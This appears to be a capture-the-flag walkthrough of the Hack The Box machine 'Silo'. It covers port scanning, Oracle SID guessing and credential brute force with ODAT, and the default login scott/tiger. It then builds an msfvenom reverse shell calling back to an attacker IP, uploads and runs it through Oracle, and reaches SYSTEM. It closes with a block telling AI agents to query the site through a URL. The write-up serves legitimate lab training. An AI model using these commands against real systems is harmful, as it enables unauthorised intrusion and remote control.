# Silo **Reconnaissance:** ``` ┌──(kali💀kali)-[~] └─$ sudo nmap -sC -sV -O 10.10.10.82 80/tcp open http Microsoft IIS httpd 8.5 |_http-title: IIS Windows Server |_http-server-header: Microsoft-IIS/8.5 | http-methods: |_ Potentially risky methods: TRACE 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds 1521/tcp open oracle-tns Oracle TNS listener 11.2.0.2.0 (unauthorized) 49152/tcp open msrpc Microsoft Windows RPC 49153/tcp open msrpc Microsoft Windows RPC 49154/tcp open msrpc Microsoft Windows RPC 49155/tcp open msrpc Microsoft Windows RPC 49159/tcp open oracle-tns Oracle TNS listener (requires service name) 49160/tcp open msrpc Microsoft Windows RPC 49161/tcp open msrpc Microsoft Windows RPC No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ). TCP/IP fingerprint: OS:SCAN(V=7.94SVN%E=4%D=12/16%OT=80%CT=1%CU=35875%PV=Y%DS=2%DC=I%G=Y%TM=657 OS:E5D23%P=x86_64-pc-linux-gnu)SEQ(SP=104%GCD=1%ISR=10E%TI=I%CI=I%II=I%SS=S OS:%TS=7)SEQ(SP=104%GCD=2%ISR=10E%TI=I%CI=I%II=I%SS=S%TS=7)SEQ(SP=105%GCD=1 OS:%ISR=10D%TI=I%CI=I%II=I%SS=S%TS=7)OPS(O1=M53CNW8ST11%O2=M53CNW8ST11%O3=M OS:53CNW8NNT11%O4=M53CNW8ST11%O5=M53CNW8ST11%O6=M53CST11)WIN(W1=2000%W2=200 OS:0%W3=2000%W4=2000%W5=2000%W6=2000)ECN(R=Y%DF=Y%T=80%W=2000%O=M53CNW8NNS% OS:CC=Y%Q=)T1(R=Y%DF=Y%T=80%S=O%A=S+%F=AS%RD=0%Q=)T2(R=Y%DF=Y%T=80%W=0%S=Z% OS:A=S%F=AR%O=%RD=0%Q=)T3(R=Y%DF=Y%T=80%W=0%S=Z%A=O%F=AR%O=%RD=0%Q=)T4(R=Y% OS:DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR% OS:O=%RD=0%Q=)T6(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=80% OS:W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=N)U1(R=Y%DF=N%T=80%IPL=164%UN=0%RIPL=G OS:%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=80%CD=Z) Network Distance: 2 hops Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows Host script results: | smb2-security-mode: | 3:0:2: |_ Message signing enabled but not required | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: supported | smb2-time: | date: 2023-12-17T02:29:46 |_ start_date: 2023-12-17T02:23:51 |_clock-skew: mean: -2s, deviation: 0s, median: -3s ``` ``` ┌──(kali💀kali)-[~] └─$ sudo nmap -sU -O 10.10.10.82 PORT STATE SERVICE 123/udp open|filtered ntp 137/udp open|filtered netbios-ns 138/udp open|filtered netbios-dgm 500/udp open|filtered isakmp 4500/udp open|filtered nat-t-ike 5355/udp open|filtered llmnr 20003/udp open|filtered commtact-https 40805/udp open|filtered unknown ``` We have fifteen open ports. * Port 80: running Microsoft-IIS/8.5 * Ports 135, 49152, 49153, 49154, 49155,49158, 49161 & 49162: running Microsoft Windows RPC * Ports 139 & 445: running Samba * Ports 1521 & 4196: running Oracle TNS listener * Ports 5985 & 47001: running Microsoft HTTP API httpd 2.0 Port 80 is running a Microsoft IIS server. A quick google search tells us that the OS is probably Windows Server 2012 R2. The gobuster scan didn’t really find anything useful for this web server. ``` ┌──(kali💀kali)-[~] └─$ nikto -host 10.10.10.82 + Server: Microsoft-IIS/8.5 + /: Retrieved x-powered-by header: ASP.NET. + /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options + /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/ + /FvdPFBj4.ashx: Retrieved x-aspnet-version header: 4.0.30319. + No CGI Directories found (use '-C all' to force check all possible dirs) + OPTIONS: Allowed HTTP Methods: OPTIONS, TRACE, GET, HEAD, POST . + OPTIONS: Public HTTP Methods: OPTIONS, TRACE, GET, HEAD, POST . ``` ``` ┌──(kali💀kali)-[~] └─$ gobuster dir -t 10 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.10.82/ /*checkout* (Status: 400) [Size: 3420] /*docroot* (Status: 400) [Size: 3420] /* (Status: 400) [Size: 3420] /http%3A%2F%2Fwww (Status: 400) [Size: 3420] /http%3A (Status: 400) [Size: 3420] /q%26a (Status: 400) [Size: 3420] /**http%3a (Status: 400) [Size: 3420] /*http%3A (Status: 400) [Size: 3420] ``` **Enumeration:** ``` ┌──(kali💀kali)-[~] └─$ searchsploit Oracle TNS listener Oracle 10gR2 - TNS Listener AUTH_SESSKEY Buffer Overflow (Met | windows/remote/16342.rb Oracle 8.1.x/9.0/9.2 - TNS Listener Service_CurLoad Remote De | multiple/dos/21782.txt Oracle 8i - TNS Listener 'ARGUMENTS' Remote Buffer Overflow ( | windows/remote/16340.rb Oracle 8i - TNS Listener Buffer Overflow | windows/remote/20980.c Oracle 8i - TNS Listener Local Command Parameter Buffer Overf | linux/local/21362.c Oracle 8i - TNS Listener SERVICE_NAME Buffer Overflow (Metasp | windows/remote/16341.rb Oracle RDBms 10.2.0.3/11.1.0.6 - TNS Listener (PoC) | windows/dos/8507.py ``` If you don’t have ODAT installed on kali, the installation instructions can be found: {% embed url="" %} {% embed url="" %} The first thing we need to enumerate is the Oracle System ID (SID) string. This is a string that is used to uniquely identify a particular database on a system. This can be done using the sidguesser module in ODAT. ``` ┌──(kali💀kali)-[~] └─$ sudo odat sidguesser -s 10.10.10.82 -p1521 [1] (10.10.10.82:1521): Searching valid SIDs [1.1] Searching valid SIDs thanks to a well known SID list on the 10.10.10.82:1521 server [+] 'XE' is a valid SID. Continue... ######################### | ETA: 00:00:03 100% |#########################################################################| Time: 00:06:24 [1.2] Searching valid SIDs thanks to a brute-force attack on 1 chars now (10.10.10.82:1521) 100% |#########################################################################| Time: 00:00:12 [1.3] Searching valid SIDs thanks to a brute-force attack on 2 chars now (10.10.10.82:1521) [+] 'XE' is a valid SID. Continue... ################## | ETA: 00:00:37 100% |#########################################################################| Time: 00:05:46 [+] SIDs found on the 10.10.10.82:1521 server: XE ``` This takes a while, but it does find 4 valid SID strings. ``` [+] SIDs found on the 10.10.10.82:1521 server: XE,XEXDB,SA,SB ``` We discovered an SID called ‘XE’. Now let’s try finding valid credentials on this server: ``` ┌──(kali💀kali)-[~] └─$ sudo odat passwordguesser -s 10.10.10.82 -p1521 -d XE [1] (10.10.10.82:1521): Searching valid accounts on the 10.10.10.82 server, port 1521 The login cis has already been tested at least once. What do you want to do: | ETA: 00:19:52 - stop (s/S) - continue and ask every time (a/A) - skip and continue to ask (p/P) - continue without to ask (c/C) c [!] Notice: 'ctxsys' account is locked, so skipping this username for password | ETA: 00:22:51 [!] Notice: 'dbsnmp' account is locked, so skipping this username for password | ETA: 00:21:55 [!] Notice: 'dip' account is locked, so skipping this username for password | ETA: 00:20:38 [!] Notice: 'hr' account is locked, so skipping this username for password | ETA: 00:16:36 [!] Notice: 'mdsys' account is locked, so skipping this username for password | ETA: 00:12:38 [!] Notice: 'oracle_ocm' account is locked, so skipping this username for passwordTA: 00:09:48 [!] Notice: 'outln' account is locked, so skipping this username for password | ETA: 00:08:48 [+] Valid credentials found: scott/tiger. Continue... ########## | ETA: 00:04:50 [!] Notice: 'xdb' account is locked, so skipping this username for password# | ETA: 00:00:57 100% |#########################################################################| Time: 00:24:01 [+] Accounts found on 10.10.10.82:1521/sid:XE: scott/tiger ``` Now we have valid credentials: user ‘scott’ and password ‘tiger’ for the server ID ‘XE’. We can use them to upload a reverse shell and execute it. To do that first we need to prepare our EXE reverse shell using MSFvenom: ``` ┌──(kali💀kali)-[~/Desktop] └─$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.3 LPORT=4444 -f exe > shell.exe ``` Now upload the reverse shell: ``` ┌──(kali💀kali)-[~] └─$ sudo odat utlfile -s 10.10.10.82 --sysdba -d XE -U scott -P tiger --putFile /temp tonee.exe /home/kali/Desktop/shell.exe ``` Start the NC listener on the port that we used with MSFvenom: ``` ┌──(kali💀kali)-[~] └─$ nc -nvlp 4444 ``` Finally, execute the shell: ``` ┌──(kali💀kali)-[~] └─$ sudo odat externaltable -s 10.10.10.82 --sysdba -d XE -U scott -P tiger --exec /temp tonee.exe ``` Go back to your NC listener: We are NT Authority\System. --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://oscp-exodussec.gitbook.io/cheatsheet55/htb-windows-oscp-prep/silo.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.